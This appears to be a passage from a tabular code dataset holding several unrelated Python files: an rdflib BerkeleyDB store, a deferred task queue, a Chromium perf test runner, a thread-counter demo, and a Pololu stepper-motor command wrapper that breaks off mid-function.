source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
berkeleydb.py
|
import logging
from os import mkdir
from os.path import abspath, exists
from threading import Thread
from urllib.request import pathname2url
from rdflib.store import NO_STORE, VALID_STORE, Store
from rdflib.term import URIRef
def bb(u):
return u.encode("utf-8")
try:
from berkeleydb import db
has_bsddb = True
except ImportError:
has_bsddb = False
if has_bsddb:
# These are passed to bsddb when creating DBs
# passed to db.DBEnv.set_flags
ENVSETFLAGS = db.DB_CDB_ALLDB
# passed to db.DBEnv.open
ENVFLAGS = db.DB_INIT_MPOOL | db.DB_INIT_CDB | db.DB_THREAD
CACHESIZE = 1024 * 1024 * 50
# passed to db.DB.Open()
DBOPENFLAGS = db.DB_THREAD
logger = logging.getLogger(__name__)
__all__ = ["BerkeleyDB"]
class BerkeleyDB(Store):
"""\
A store that allows for on-disk persistent using BerkeleyDB, a fast
key/value DB.
This store implementation used to be known, previous to rdflib 6.0.0
as 'Sleepycat' due to that being the then name of the Python wrapper
for BerkeleyDB.
This store allows for quads as well as triples. See examples of use
in both the `examples.berkeleydb_example` and `test.test_store_berkeleydb`
files.
**NOTE on installation**:
To use this store, you must have BerkeleyDB installed on your system
separately to Python (`brew install berkeley-db` on a Mac) and also have
the BerkeleyDB Python wrapper installed (`pip install berkeleydb`).
You may need to install BerkeleyDB Python wrapper like this:
`YES_I_HAVE_THE_RIGHT_TO_USE_THIS_BERKELEY_DB_VERSION=1 pip install berkeleydb`
"""
context_aware = True
formula_aware = True
transaction_aware = False
graph_aware = True
db_env = None
def __init__(self, configuration=None, identifier=None):
if not has_bsddb:
raise ImportError("Unable to import berkeleydb, store is unusable.")
self.__open = False
self.__identifier = identifier
super(BerkeleyDB, self).__init__(configuration)
self._loads = self.node_pickler.loads
self._dumps = self.node_pickler.dumps
def __get_identifier(self):
return self.__identifier
identifier = property(__get_identifier)
def _init_db_environment(self, homeDir, create=True):
if not exists(homeDir):
if create is True:
mkdir(homeDir)
# TODO: implement create method and refactor this to it
self.create(homeDir)
else:
return NO_STORE
db_env = db.DBEnv()
db_env.set_cachesize(0, CACHESIZE) # TODO
# db_env.set_lg_max(1024*1024)
db_env.set_flags(ENVSETFLAGS, 1)
db_env.open(homeDir, ENVFLAGS | db.DB_CREATE)
return db_env
def is_open(self):
return self.__open
def open(self, path, create=True):
if not has_bsddb:
return NO_STORE
homeDir = path
if self.__identifier is None:
self.__identifier = URIRef(pathname2url(abspath(homeDir)))
db_env = self._init_db_environment(homeDir, create)
if db_env == NO_STORE:
return NO_STORE
self.db_env = db_env
self.__open = True
dbname = None
dbtype = db.DB_BTREE
# auto-commit ensures that the open-call commits when transactions
# are enabled
dbopenflags = DBOPENFLAGS
if self.transaction_aware is True:
dbopenflags |= db.DB_AUTO_COMMIT
if create:
dbopenflags |= db.DB_CREATE
dbmode = 0o660
dbsetflags = 0
# create and open the DBs
self.__indicies = [
None,
] * 3
self.__indicies_info = [
None,
] * 3
for i in range(0, 3):
index_name = to_key_func(i)(
("s".encode("latin-1"), "p".encode("latin-1"), "o".encode("latin-1")),
"c".encode("latin-1"),
).decode()
index = db.DB(db_env)
index.set_flags(dbsetflags)
index.open(index_name, dbname, dbtype, dbopenflags, dbmode)
self.__indicies[i] = index
self.__indicies_info[i] = (index, to_key_func(i), from_key_func(i))
lookup = {}
for i in range(0, 8):
results = []
for start in range(0, 3):
score = 1
len = 0
for j in range(start, start + 3):
if i & (1 << (j % 3)):
score = score << 1
len += 1
else:
break
tie_break = 2 - start
results.append(((score, tie_break), start, len))
results.sort()
score, start, len = results[-1]
def get_prefix_func(start, end):
def get_prefix(triple, context):
if context is None:
yield ""
else:
yield context
i = start
while i < end:
yield triple[i % 3]
i += 1
yield ""
return get_prefix
lookup[i] = (
self.__indicies[start],
get_prefix_func(start, start + len),
from_key_func(start),
results_from_key_func(start, self._from_string),
)
self.__lookup_dict = lookup
self.__contexts = db.DB(db_env)
self.__contexts.set_flags(dbsetflags)
self.__contexts.open("contexts", dbname, dbtype, dbopenflags, dbmode)
self.__namespace = db.DB(db_env)
self.__namespace.set_flags(dbsetflags)
self.__namespace.open("namespace", dbname, dbtype, dbopenflags, dbmode)
self.__prefix = db.DB(db_env)
self.__prefix.set_flags(dbsetflags)
self.__prefix.open("prefix", dbname, dbtype, dbopenflags, dbmode)
self.__k2i = db.DB(db_env)
self.__k2i.set_flags(dbsetflags)
self.__k2i.open("k2i", dbname, db.DB_HASH, dbopenflags, dbmode)
self.__i2k = db.DB(db_env)
self.__i2k.set_flags(dbsetflags)
self.__i2k.open("i2k", dbname, db.DB_RECNO, dbopenflags, dbmode)
self.__needs_sync = False
t = Thread(target=self.__sync_run)
t.setDaemon(True)
t.start()
self.__sync_thread = t
return VALID_STORE
def __sync_run(self):
from time import sleep, time
try:
min_seconds, max_seconds = 10, 300
while self.__open:
if self.__needs_sync:
t0 = t1 = time()
self.__needs_sync = False
while self.__open:
sleep(0.1)
if self.__needs_sync:
t1 = time()
self.__needs_sync = False
if time() - t1 > min_seconds or time() - t0 > max_seconds:
self.__needs_sync = False
logger.debug("sync")
self.sync()
break
else:
sleep(1)
except Exception as e:
logger.exception(e)
def sync(self):
if self.__open:
for i in self.__indicies:
i.sync()
self.__contexts.sync()
self.__namespace.sync()
self.__prefix.sync()
self.__i2k.sync()
self.__k2i.sync()
def close(self, commit_pending_transaction=False):
self.__open = False
self.__sync_thread.join()
for i in self.__indicies:
i.close()
self.__contexts.close()
self.__namespace.close()
self.__prefix.close()
self.__i2k.close()
self.__k2i.close()
self.db_env.close()
def add(self, triple, context, quoted=False, txn=None):
"""\
Add a triple to the store of triples.
"""
(subject, predicate, object) = triple
assert self.__open, "The Store must be open."
assert context != self, "Can not add triple directly to store"
Store.add(self, (subject, predicate, object), context, quoted)
_to_string = self._to_string
s = _to_string(subject, txn=txn)
p = _to_string(predicate, txn=txn)
o = _to_string(object, txn=txn)
c = _to_string(context, txn=txn)
cspo, cpos, cosp = self.__indicies
value = cspo.get(bb("%s^%s^%s^%s^" % (c, s, p, o)), txn=txn)
if value is None:
self.__contexts.put(bb(c), b"", txn=txn)
contexts_value = cspo.get(
bb("%s^%s^%s^%s^" % ("", s, p, o)), txn=txn
) or "".encode("latin-1")
contexts = set(contexts_value.split("^".encode("latin-1")))
contexts.add(bb(c))
contexts_value = "^".encode("latin-1").join(contexts)
assert contexts_value is not None
cspo.put(bb("%s^%s^%s^%s^" % (c, s, p, o)), b"", txn=txn)
cpos.put(bb("%s^%s^%s^%s^" % (c, p, o, s)), b"", txn=txn)
cosp.put(bb("%s^%s^%s^%s^" % (c, o, s, p)), b"", txn=txn)
if not quoted:
cspo.put(bb("%s^%s^%s^%s^" % ("", s, p, o)), contexts_value, txn=txn)
cpos.put(bb("%s^%s^%s^%s^" % ("", p, o, s)), contexts_value, txn=txn)
cosp.put(bb("%s^%s^%s^%s^" % ("", o, s, p)), contexts_value, txn=txn)
self.__needs_sync = True
def __remove(self, spo, c, quoted=False, txn=None):
s, p, o = spo
cspo, cpos, cosp = self.__indicies
contexts_value = cspo.get(
"^".encode("latin-1").join(
["".encode("latin-1"), s, p, o, "".encode("latin-1")]
),
txn=txn,
) or "".encode("latin-1")
contexts = set(contexts_value.split("^".encode("latin-1")))
contexts.discard(c)
contexts_value = "^".encode("latin-1").join(contexts)
for i, _to_key, _from_key in self.__indicies_info:
i.delete(_to_key((s, p, o), c), txn=txn)
if not quoted:
if contexts_value:
for i, _to_key, _from_key in self.__indicies_info:
i.put(
_to_key((s, p, o), "".encode("latin-1")),
contexts_value,
txn=txn,
)
else:
for i, _to_key, _from_key in self.__indicies_info:
try:
i.delete(_to_key((s, p, o), "".encode("latin-1")), txn=txn)
except db.DBNotFoundError:
pass # TODO: is it okay to ignore these?
def remove(self, spo, context, txn=None):
subject, predicate, object = spo
assert self.__open, "The Store must be open."
Store.remove(self, (subject, predicate, object), context)
_to_string = self._to_string
if context is not None:
if context == self:
context = None
if (
subject is not None
and predicate is not None
and object is not None
and context is not None
):
s = _to_string(subject, txn=txn)
p = _to_string(predicate, txn=txn)
o = _to_string(object, txn=txn)
c = _to_string(context, txn=txn)
value = self.__indicies[0].get(bb("%s^%s^%s^%s^" % (c, s, p, o)), txn=txn)
if value is not None:
self.__remove((bb(s), bb(p), bb(o)), bb(c), txn=txn)
self.__needs_sync = True
else:
cspo, cpos, cosp = self.__indicies
index, prefix, from_key, results_from_key = self.__lookup(
(subject, predicate, object), context, txn=txn
)
cursor = index.cursor(txn=txn)
try:
current = cursor.set_range(prefix)
needs_sync = True
except db.DBNotFoundError:
current = None
needs_sync = False
cursor.close()
while current:
key, value = current
cursor = index.cursor(txn=txn)
try:
cursor.set_range(key)
# Hack to stop 2to3 converting this to next(cursor)
current = getattr(cursor, "next")()
except db.DBNotFoundError:
current = None
cursor.close()
if key.startswith(prefix):
c, s, p, o = from_key(key)
if context is None:
contexts_value = index.get(key, txn=txn) or "".encode("latin-1")
# remove triple from all non quoted contexts
contexts = set(contexts_value.split("^".encode("latin-1")))
# and from the conjunctive index
contexts.add("".encode("latin-1"))
for c in contexts:
for i, _to_key, _ in self.__indicies_info:
i.delete(_to_key((s, p, o), c), txn=txn)
else:
self.__remove((s, p, o), c, txn=txn)
else:
break
if context is not None:
if subject is None and predicate is None and object is None:
# TODO: also if context becomes empty and not just on
# remove((None, None, None), c)
try:
self.__contexts.delete(
bb(_to_string(context, txn=txn)), txn=txn
)
except db.DBNotFoundError:
pass
self.__needs_sync = needs_sync
def triples(self, spo, context=None, txn=None):
"""A generator over all the triples matching"""
assert self.__open, "The Store must be open."
subject, predicate, object = spo
if context is not None:
if context == self:
context = None
# _from_string = self._from_string ## UNUSED
index, prefix, from_key, results_from_key = self.__lookup(
(subject, predicate, object), context, txn=txn
)
cursor = index.cursor(txn=txn)
try:
current = cursor.set_range(prefix)
except db.DBNotFoundError:
current = None
cursor.close()
while current:
key, value = current
cursor = index.cursor(txn=txn)
try:
cursor.set_range(key)
# Cheap hack so 2to3 doesn't convert to next(cursor)
current = getattr(cursor, "next")()
except db.DBNotFoundError:
current = None
cursor.close()
if key and key.startswith(prefix):
contexts_value = index.get(key, txn=txn)
yield results_from_key(key, subject, predicate, object, contexts_value)
else:
break
def __len__(self, context=None):
assert self.__open, "The Store must be open."
if context is not None:
if context == self:
context = None
if context is None:
prefix = "^".encode("latin-1")
else:
prefix = bb("%s^" % self._to_string(context))
index = self.__indicies[0]
cursor = index.cursor()
current = cursor.set_range(prefix)
count = 0
while current:
key, value = current
if key.startswith(prefix):
count += 1
# Hack to stop 2to3 converting this to next(cursor)
current = getattr(cursor, "next")()
else:
break
cursor.close()
return count
def bind(self, prefix, namespace, override=True):
prefix = prefix.encode("utf-8")
namespace = namespace.encode("utf-8")
bound_prefix = self.__prefix.get(namespace)
bound_namespace = self.__namespace.get(prefix)
if override:
if bound_prefix:
self.__namespace.delete(bound_prefix)
if bound_namespace:
self.__prefix.delete(bound_namespace)
self.__prefix[namespace] = prefix
self.__namespace[prefix] = namespace
else:
self.__prefix[bound_namespace or namespace] = bound_prefix or prefix
self.__namespace[bound_prefix or prefix] = bound_namespace or namespace
def namespace(self, prefix):
prefix = prefix.encode("utf-8")
ns = self.__namespace.get(prefix, None)
if ns is not None:
return URIRef(ns.decode("utf-8"))
return None
def prefix(self, namespace):
namespace = namespace.encode("utf-8")
prefix = self.__prefix.get(namespace, None)
if prefix is not None:
return prefix.decode("utf-8")
return None
def namespaces(self):
cursor = self.__namespace.cursor()
results = []
current = cursor.first()
while current:
prefix, namespace = current
results.append((prefix.decode("utf-8"), namespace.decode("utf-8")))
# Hack to stop 2to3 converting this to next(cursor)
current = getattr(cursor, "next")()
cursor.close()
for prefix, namespace in results:
yield prefix, URIRef(namespace)
def contexts(self, triple=None):
_from_string = self._from_string
_to_string = self._to_string
if triple:
s, p, o = triple
s = _to_string(s)
p = _to_string(p)
o = _to_string(o)
contexts = self.__indicies[0].get(bb("%s^%s^%s^%s^" % ("", s, p, o)))
if contexts:
for c in contexts.split("^".encode("latin-1")):
if c:
yield _from_string(c)
else:
index = self.__contexts
cursor = index.cursor()
current = cursor.first()
cursor.close()
while current:
key, value = current
context = _from_string(key)
yield context
cursor = index.cursor()
try:
cursor.set_range(key)
# Hack to stop 2to3 converting this to next(cursor)
current = getattr(cursor, "next")()
except db.DBNotFoundError:
current = None
cursor.close()
def add_graph(self, graph):
self.__contexts.put(bb(self._to_string(graph)), b"")
def remove_graph(self, graph):
self.remove((None, None, None), graph)
def _from_string(self, i):
k = self.__i2k.get(int(i))
return self._loads(k)
def _to_string(self, term, txn=None):
k = self._dumps(term)
i = self.__k2i.get(k, txn=txn)
if i is None:
# weird behaviour from bsddb not taking a txn as a keyword argument
# for append
if self.transaction_aware:
i = "%s" % self.__i2k.append(k, txn)
else:
i = "%s" % self.__i2k.append(k)
self.__k2i.put(k, i.encode(), txn=txn)
else:
i = i.decode()
return i
def __lookup(self, spo, context, txn=None):
subject, predicate, object = spo
_to_string = self._to_string
if context is not None:
context = _to_string(context, txn=txn)
i = 0
if subject is not None:
i += 1
subject = _to_string(subject, txn=txn)
if predicate is not None:
i += 2
predicate = _to_string(predicate, txn=txn)
if object is not None:
i += 4
object = _to_string(object, txn=txn)
index, prefix_func, from_key, results_from_key = self.__lookup_dict[i]
# print (subject, predicate, object), context, prefix_func, index
# #DEBUG
prefix = bb("^".join(prefix_func((subject, predicate, object), context)))
return index, prefix, from_key, results_from_key
def to_key_func(i):
def to_key(triple, context):
"Takes a string; returns key"
return "^".encode("latin-1").join(
(
context,
triple[i % 3],
triple[(i + 1) % 3],
triple[(i + 2) % 3],
"".encode("latin-1"),
)
) # "" to tac on the trailing ^
return to_key
def from_key_func(i):
def from_key(key):
"Takes a key; returns string"
parts = key.split("^".encode("latin-1"))
return (
parts[0],
parts[(3 - i + 0) % 3 + 1],
parts[(3 - i + 1) % 3 + 1],
parts[(3 - i + 2) % 3 + 1],
)
return from_key
def results_from_key_func(i, from_string):
def from_key(key, subject, predicate, object, contexts_value):
"Takes a key and subject, predicate, object; returns tuple for yield"
parts = key.split("^".encode("latin-1"))
if subject is None:
# TODO: i & 1: # dis assemble and/or measure to see which is faster
# subject is None or i & 1
s = from_string(parts[(3 - i + 0) % 3 + 1])
else:
s = subject
if predicate is None: # i & 2:
p = from_string(parts[(3 - i + 1) % 3 + 1])
else:
p = predicate
if object is None: # i & 4:
o = from_string(parts[(3 - i + 2) % 3 + 1])
else:
o = object
return (
(s, p, o),
(from_string(c) for c in contexts_value.split("^".encode("latin-1")) if c),
)
return from_key
def readable_index(i):
s, p, o = "?" * 3
if i & 1:
s = "s"
if i & 2:
p = "p"
if i & 4:
o = "o"
return "%s,%s,%s" % (s, p, o)
|
deferred.py
|
import sys
import time
import traceback
from queue import Empty, Full, Queue
from threading import Lock, Thread
from ..lib import logger, reporter
from ..lib.errors import ExpectedError
from ..setup import is_same_package
# A global queue that is used for the convenience methods provided below.
_queue = Queue(maxsize=8)
def _handler(payload):
func = payload.get('func')
args = payload.get('args', [])
kwargs = payload.get('kwargs', {})
done = payload.get('done')
if func:
res = func(*args, **kwargs)
if done:
done(res)
def _pop(queue):
try:
queue.get(block=False)
except Empty:
pass
class Consumer:
"""Consumer class which consumes events from a queue. Consumption occurs
in a separate thread. Multiple consumers can consume from the same queue
since synchronization is done implicitly by the queue data type.
"""
def __init__(self, queue, handler):
"""Initialize a consumer. This constructor does not start consumption.
Instead, the caller of this method should also call `start` to start
consumption.
Arguments:
queue: An instance of a `Queue` class to consume events from.
handler: A function which is called on the events taken from the
queue.
"""
self.queue = queue
self.handler = handler
self.thread = None
self.lock = Lock()
self.consuming = False
def start(self):
"""Start consuming from the queue in a separate thread.
"""
with self.lock:
if self.consuming:
return
self.consuming = True
self.thread = Thread(target=self._consume)
self.thread.start()
def stop(self):
"""Stop consuming and join the underlying thread.
"""
with self.lock:
self.consuming = False
self.thread.join()
def _consume(self):
"""The consumption loop in which events are pulled from the queue
and handled by the consumer. All exceptions are caught in order to
prevent the underlying thread from stopping unncessarily.
"""
while self.consuming:
try:
payload = self.queue.get(block=False)
self.handler(payload)
except Empty:
time.sleep(0.01)
except ExpectedError as exc:
logger.debug('caught expected {}: {}'
.format(exc.__class__.__name__, str(exc)))
except Exception as exc:
reporter.send_rollbar_exc(sys.exc_info())
logger.debug('caught {}: {}'
.format(exc.__class__.__name__, str(exc)))
def defer(func, *args, **kwargs):
"""Defer a function call to be executed asynchronously in the background.
If the queue is full, then this function call will either be ignored or
forced onto the queue depending on the presence and value of an optional
`_force` argument.
A `_force` argument can be passed into the keyword arguments to control
whether or not the function call should be forced onto the queue. If this
argument is true and the queue is full when this function is called, then
the oldest item on the queue will be dropped and the defer call will be
retried. The `_force` argument defaults to true.
A `_done` callback can be passed into the keyword arguments. If this
callback is present, it will be called on the return value of the executed
function.
Arguments:
func: The function to execute.
args: The positional arguments to pass to the function.
kwargs: The keyword arguments to pass to the function.
Returns:
True if the function call was queued successfully, False otherwise.
"""
done = kwargs.pop('_done', None)
force = kwargs.pop('_force', True)
try:
payload = {
'func': func,
'args': args,
'kwargs': kwargs,
'done': done,
}
_queue.put(payload, block=False)
return True
except Full:
if not force:
logger.debug('skipping defer because queue is full')
return False
else:
logger.debug('forcing defer because queue is full')
_pop(_queue)
kwargs.update({'_done': done, '_force': force})
return defer(func, *args, **kwargs)
def consume():
"""Create a consumer and start the consumption loop. This function needs
to be called at least once in order for the `defer` function to have any
meaningful effect.
"""
c = Consumer(_queue, _handler)
c.start()
return c
|
test_runner.py
|
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Runs perf tests.
Our buildbot infrastructure requires each slave to run steps serially.
This is sub-optimal for android, where these steps can run independently on
multiple connected devices.
The buildbots will run this script multiple times per cycle:
- First: all steps listed in --steps in will be executed in parallel using all
connected devices. Step results will be pickled to disk. Each step has a unique
name. The result code will be ignored if the step name is listed in
--flaky-steps.
The buildbot will treat this step as a regular step, and will not process any
graph data.
- Then, with -print-step STEP_NAME: at this stage, we'll simply print the file
with the step results previously saved. The buildbot will then process the graph
data accordingly.
The JSON steps file contains a dictionary in the format:
[
["step_name_foo", "script_to_execute foo"],
["step_name_bar", "script_to_execute bar"]
]
This preserves the order in which the steps are executed.
The JSON flaky steps file contains a list with step names which results should
be ignored:
[
"step_name_foo",
"step_name_bar"
]
Note that script_to_execute necessarily have to take at least the following
option:
--device: the serial number to be passed to all adb commands.
"""
import datetime
import logging
import os
import pickle
import sys
import threading
import time
from pylib import constants
from pylib import forwarder
from pylib import pexpect
from pylib.base import base_test_result
from pylib.base import base_test_runner
def PrintTestOutput(test_name):
"""Helper method to print the output of previously executed test_name.
Args:
test_name: name of the test that has been previously executed.
Returns:
exit code generated by the test step.
"""
file_name = os.path.join(constants.PERF_OUTPUT_DIR, test_name)
if not os.path.exists(file_name):
logging.error('File not found %s', file_name)
return 1
with file(file_name, 'r') as f:
persisted_result = pickle.loads(f.read())
logging.info('*' * 80)
logging.info('Output from:')
logging.info(persisted_result['cmd'])
logging.info('*' * 80)
print persisted_result['output']
return persisted_result['exit_code']
def PrintSummary(test_names):
logging.info('*' * 80)
logging.info('Sharding summary')
total_time = 0
for test_name in test_names:
file_name = os.path.join(constants.PERF_OUTPUT_DIR, test_name)
if not os.path.exists(file_name):
logging.info('%s : No status file found', test_name)
continue
with file(file_name, 'r') as f:
result = pickle.loads(f.read())
logging.info('%s : exit_code=%d in %d secs at %s',
result['name'], result['exit_code'], result['total_time'],
result['device'])
total_time += result['total_time']
logging.info('Total steps time: %d secs', total_time)
class _HeartBeatLogger(object):
# How often to print the heartbeat on flush().
_PRINT_INTERVAL = 30.0
def __init__(self):
"""A file-like class for keeping the buildbot alive."""
self._len = 0
self._tick = time.time()
self._stopped = threading.Event()
self._timer = threading.Thread(target=self._runner)
self._timer.start()
def _runner(self):
while not self._stopped.is_set():
self.flush()
self._stopped.wait(_HeartBeatLogger._PRINT_INTERVAL)
def write(self, data):
self._len += len(data)
def flush(self):
now = time.time()
if now - self._tick >= _HeartBeatLogger._PRINT_INTERVAL:
self._tick = now
print '--single-step output length %d' % self._len
sys.stdout.flush()
def stop(self):
self._stopped.set()
class TestRunner(base_test_runner.BaseTestRunner):
def __init__(self, test_options, device, tests, flaky_tests):
"""A TestRunner instance runs a perf test on a single device.
Args:
test_options: A PerfOptions object.
device: Device to run the tests.
tests: a dict mapping test_name to command.
flaky_tests: a list of flaky test_name.
"""
super(TestRunner, self).__init__(device, None, 'Release')
self._options = test_options
self._tests = tests
self._flaky_tests = flaky_tests
@staticmethod
def _IsBetter(result):
if result['actual_exit_code'] == 0:
return True
pickled = os.path.join(constants.PERF_OUTPUT_DIR,
result['name'])
if not os.path.exists(pickled):
return True
with file(pickled, 'r') as f:
previous = pickle.loads(f.read())
return result['actual_exit_code'] < previous['actual_exit_code']
@staticmethod
def _SaveResult(result):
if TestRunner._IsBetter(result):
with file(os.path.join(constants.PERF_OUTPUT_DIR,
result['name']), 'w') as f:
f.write(pickle.dumps(result))
def _LaunchPerfTest(self, test_name):
"""Runs a perf test.
Args:
test_name: the name of the test to be executed.
Returns:
A tuple containing (Output, base_test_result.ResultType)
"""
try:
logging.warning('Unmapping device ports')
forwarder.Forwarder.UnmapAllDevicePorts(self.adb)
self.adb.RestartAdbdOnDevice()
except Exception as e:
logging.error('Exception when tearing down device %s', e)
cmd = ('%s --device %s' %
(self._tests[test_name], self.device))
logging.info('%s : %s', test_name, cmd)
start_time = datetime.datetime.now()
timeout = 5400
if self._options.no_timeout:
timeout = None
full_cmd = cmd
if self._options.dry_run:
full_cmd = 'echo %s' % cmd
logfile = sys.stdout
if self._options.single_step:
# Just print a heart-beat so that the outer buildbot scripts won't timeout
# without response.
logfile = _HeartBeatLogger()
cwd = os.path.abspath(constants.DIR_SOURCE_ROOT)
if full_cmd.startswith('src/'):
cwd = os.path.abspath(os.path.join(constants.DIR_SOURCE_ROOT, os.pardir))
output, exit_code = pexpect.run(
full_cmd, cwd=cwd,
withexitstatus=True, logfile=logfile, timeout=timeout,
env=os.environ)
if self._options.single_step:
# Stop the logger.
logfile.stop()
end_time = datetime.datetime.now()
if exit_code is None:
exit_code = -1
logging.info('%s : exit_code=%d in %d secs at %s',
test_name, exit_code, (end_time - start_time).seconds,
self.device)
result_type = base_test_result.ResultType.FAIL
if exit_code == 0:
result_type = base_test_result.ResultType.PASS
actual_exit_code = exit_code
if test_name in self._flaky_tests:
# The exit_code is used at the second stage when printing the
# test output. If the test is flaky, force to "0" to get that step green
# whilst still gathering data to the perf dashboards.
# The result_type is used by the test_dispatcher to retry the test.
exit_code = 0
persisted_result = {
'name': test_name,
'output': output,
'exit_code': exit_code,
'actual_exit_code': actual_exit_code,
'result_type': result_type,
'total_time': (end_time - start_time).seconds,
'device': self.device,
'cmd': cmd,
}
self._SaveResult(persisted_result)
return (output, result_type)
def RunTest(self, test_name):
"""Run a perf test on the device.
Args:
test_name: String to use for logging the test result.
Returns:
A tuple of (TestRunResults, retry).
"""
output, result_type = self._LaunchPerfTest(test_name)
results = base_test_result.TestRunResults()
results.AddResult(base_test_result.BaseTestResult(test_name, result_type))
retry = None
if not results.DidRunPass():
retry = test_name
return results, retry
|
01ThreadCounter.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# -----------------------------------------------------------------------------------------------------------
# Name: 01ThreadCounter.py
# Purpose: Simple thread counter
#
# Author: Gabriel Marti Fuentes
# email: gabimarti at gmail dot com
# GitHub: https://github.com/gabimarti
# Created: 02/08/2019
# Version: 1.0
# Revision:
# License: MIT
# -----------------------------------------------------------------------------------------------------------
#
import argparse
import random
import threading
import time
########################################################
# CONSTANTS
########################################################
DESCRIPTION = 'A simple thread counter'
EPILOG = 'What do you want me to tell you?'
MAXTHREADS = 10000
DELAYBETWEENTHREADS = 0 # Milliseconds of delay between threads
VERBOSE_LEVELS = ['basic', 'a few', 'insane info'] # Verbose levels description
MAXRANDOMSLEEP = 10 # Max time in seconds for random sleep
########################################################
# VARIABLES
########################################################
thread_counter = 0 # Total executed threads
thread_active_counter = 0 # Number of current active threads
thread_list = [] # List of active threads
max_threads = MAXTHREADS # Max threads
verbose = 0 # Verbose level
delay_threads = DELAYBETWEENTHREADS # Delay between threads
max_random_sleep = MAXRANDOMSLEEP # Max random sleep
total_sleep_seconds = 0 # Total seconds of sleep performed
average_sleep = 0 # Average sleep executed
########################################################
# FUNCTIONS
########################################################
# Wait for the indicated time in milliseconds
def delay_milliseconds(millisec):
if millisec == 0:
return None # Avoid making unnecessary call to time.sleep function
time.sleep(millisec/1000)
# Wait a random time
def do_something_more(thread_id, max_random_sleep, verbose):
global thread_counter, total_sleep_seconds
seconds = random.randint(0, max_random_sleep+1)
total_sleep_seconds += seconds
if verbose ==1:
print('.', end='')
if verbose >= 2:
print('Begin thread id %d : Active counter %d : Random Sleep %d' % (thread_id, thread_active_counter, seconds))
time.sleep(seconds)
if verbose >= 2:
print('End thread id %d : Active counter %d ' % (thread_id, thread_active_counter))
# Increase counters and call auxiliary function
def do_something(thread_id, max_random_sleep, verbose):
global thread_counter, thread_active_counter
thread_counter += 1
thread_active_counter += 1
do_something_more(thread_id, max_random_sleep, verbose)
thread_active_counter -= 1
# Parse command line parameters
def parse_params():
parser = argparse.ArgumentParser(description=DESCRIPTION, epilog=EPILOG)
parser.add_argument('-m', '--maxthreads', type=int, default=MAXTHREADS,
help='Indicates the maximum number of threads. Default value: ' + str(MAXTHREADS))
parser.add_argument('-d', '--delay', type=int, default=DELAYBETWEENTHREADS,
help='Milliseconds of delay between threads call. Default value: ' + str(DELAYBETWEENTHREADS))
parser.add_argument('-s', '--randomsleep', type=int, default=MAXRANDOMSLEEP,
help='Max random sleep in seconds for every process. Default value: ' + str(MAXRANDOMSLEEP))
parser.add_argument('-v', '--verbose', type=int, choices=[0, 1, 2], default=0,
help='Increase output verbosity. Default value: 0')
args = parser.parse_args()
return args
# Main
def main():
global max_threads, delay_threads, verbose, max_random_sleep
# Check and parse parameters
args = parse_params()
verbose = args.verbose
max_threads = args.maxthreads
delay_threads = args.delay
max_random_sleep = args.randomsleep
if max_threads < 1: # avoid zero division
max_threads = 1
print('Verbose level '+str(VERBOSE_LEVELS[verbose]))
print('Max %d Threads ' % (max_threads))
print('Delay between Threads %d milliseconds' % (delay_threads))
print('Max random Sleep for every process %d seconds' % (max_random_sleep))
print('Launching ...')
start = time.perf_counter()
# Launch threads and execute function do_something()(
for t_id in range(1, int(max_threads)+1):
thread_handler = threading.Thread(target=do_something, args=(t_id, max_random_sleep, verbose))
thread_handler.start()
thread_list.append(thread_handler)
delay_milliseconds(delay_threads) # delay between threads
if verbose >= 1:
print('Finished threads launch.')
print('Total threads %d : Current active %d' % (thread_counter, thread_active_counter))
partialtime = time.perf_counter() - start
print('Launched %d threads in %6.2f seconds ' % (thread_counter, partialtime))
# Wait to finish threads
for thread_wait in thread_list:
thread_wait.join()
totaltime = time.perf_counter() - start
average_sleep = total_sleep_seconds / thread_counter
print('Performed %d threads in %6.2f seconds ' % (thread_counter, totaltime))
print('Current active threads %d' % (thread_active_counter))
print('Total sleep %d (shared) seconds for all process' %(total_sleep_seconds))
print('Average sleep %6.2f seconds' % (average_sleep))
if __name__ == '__main__':
main()
|
pololu_ticcmd_wrapper.py
|
"""Pololu TIC Device."""
import subprocess
import logging
import asyncio
from threading import Thread
import ruamel.yaml
from mpf.core.utility_functions import Util
class TicError(Exception):
"""A Pololu TIC Error."""
class PololuTiccmdWrapper:
"""A Pololu TIC Device."""
def __init__(self, serial_number, machine, debug=True):
"""Return the current status of the TIC device.
Args:
serial_number (number): The serial number of the TIC to control
machine (object): The machine object
debug (boolean): Turn on debugging or not
"""
self._debug = debug
self.log = logging.getLogger('TIC Stepper')
self._serial_number = serial_number
self._machine = machine
self.loop = None
self._start_thread()
def _start_thread(self):
# Create a new loop
self.loop = asyncio.new_event_loop()
asyncio.set_event_loop(self.loop)
self.stop_future = asyncio.Future()
# Assign the loop to another thread
self.thread = Thread(target=self._run_loop)
self.thread.start()
def _run_loop(self):
"""Run the asyncio loop in this thread."""
self.loop.run_until_complete(self.stop_future)
self.loop.close()
def stop_async(self):
"""Stop loop."""
self.stop_future.set_result(True)
def stop(self):
"""Stop loop and join thread."""
self.loop.call_soon_threadsafe(self.stop_async)
self._stop_thread()
def _stop_thread(self):
self.thread.join()
def _ticcmd_future(self, *args):
"""Run ticcmd in another thread."""
future = asyncio.wrap_future(
asyncio.run_coroutine_threadsafe(self._ticcmd_remote(*args), self.loop))
future.add_done_callback(Util.raise_exceptions)
return future
def _ticcmd(self, *args):
"""Run ticcmd in another thread and forget about the response."""
self.loop.call_soon_threadsafe(self._run_subprocess_ticcmd, *args)
async def _ticcmd_remote(self, *args):
"""Return a future with the result of ticcmd."""
return self._run_subprocess_ticcmd(*args)
def _run_subprocess_ticcmd(self, *args):
"""Run ticcmd.
This will block the asyncio loop in the thread so only one command can run at a time.
However, it will not block MPF because we will call this via run_coroutine_threadsafe from another thread.
"""
args = list(args)
args.append('-d')
args.append(str(self._serial_number))
try:
output = subprocess.check_output(['ticcmd'] + args, stderr=subprocess.STDOUT)
return output
except subprocess.CalledProcessError as e:
self.log.debug("Exception: %s", str(e.output))
raise TicError(e.output)
async def get_status(self):
"""Return the current status of the TIC device."""
cmd_return = await self._ticcmd_future('-s', '--full')
status = ruamel.yaml.safe_load(cmd_return)
return status
def halt_and_hold(self):
"""Stop the motor abruptly without respecting the deceleration limit."""
self._ticcmd('--halt-and-hold')
def halt_and_set_position(self, position):
